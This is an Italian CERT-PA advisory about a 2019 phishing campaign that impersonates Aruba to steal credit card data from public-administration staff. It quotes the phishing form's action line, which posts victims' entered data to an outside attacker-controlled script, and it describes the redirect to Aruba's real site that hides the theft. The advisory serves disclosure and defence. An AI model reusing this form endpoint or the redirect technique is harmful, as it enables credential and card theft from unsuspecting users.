Phishing ai danni di clienti Aruba indirizzato alle Pubbliche Amministrazioni

08/02/2019

banking furto credenziali phishing PP.AA.

Il CERT-PA è venuto a conoscenza nella giornata odierna di una campagna di phishing volta a sottrarre credenziali di carte di credito degli utenti Aruba ed indirizzata verso caselle email di Pubbliche Amministrazioni e probabilmente anche verso società private. L’email si presenta scritta con un italiano quasi corretto, come si evince dall’immagine seguente:

Nel corpo del testo si invita l’utente a compilare il form HTML allegato in calce suggerendo di scaricarlo in locale ed eseguirlo successivamente nel caso in cui non dovesse “funzionare”.

L’allegato è, come anticipato, un form HTML che contiene una falsa pagina di Aruba che invita l’utente ad inserire i suoi dati anagrafici e quelli della carta di credito con cui effettuare il pagamento.

Analizzando l’action del form si ottiene la pagina alla quale vengono inviate i dati inseriti e provandola a visitare si può notare come la stessa, al termine dell’elaborazione, reindirizzi l’utente verso la homepage legittima di Aruba al fine di non destare alcun sospetto.

<form action="http://www.ricochet.rocks/php/php/snd1.php" method="post" id="formulaire_saisie_adresse">
...
</form>

Conclusione

Da analisi Osint è stato rinvenuto su PhishTank evidenza che la società italiana D3Lab ha rilevato campagne di phishing con analoghe caratteristiche (tutte le url puntano alla risorsa “snd1.php“) già a partire dal 18 Gennaio 2109 ospitata su domini differenti nelle campagne dei giorni a seguire.

Indicatori di Compromissione

Si riportano di seguito gli IoC rilevati dall’analisi della campagna.

  • IoC (.txt) – File globale :   Domini, URL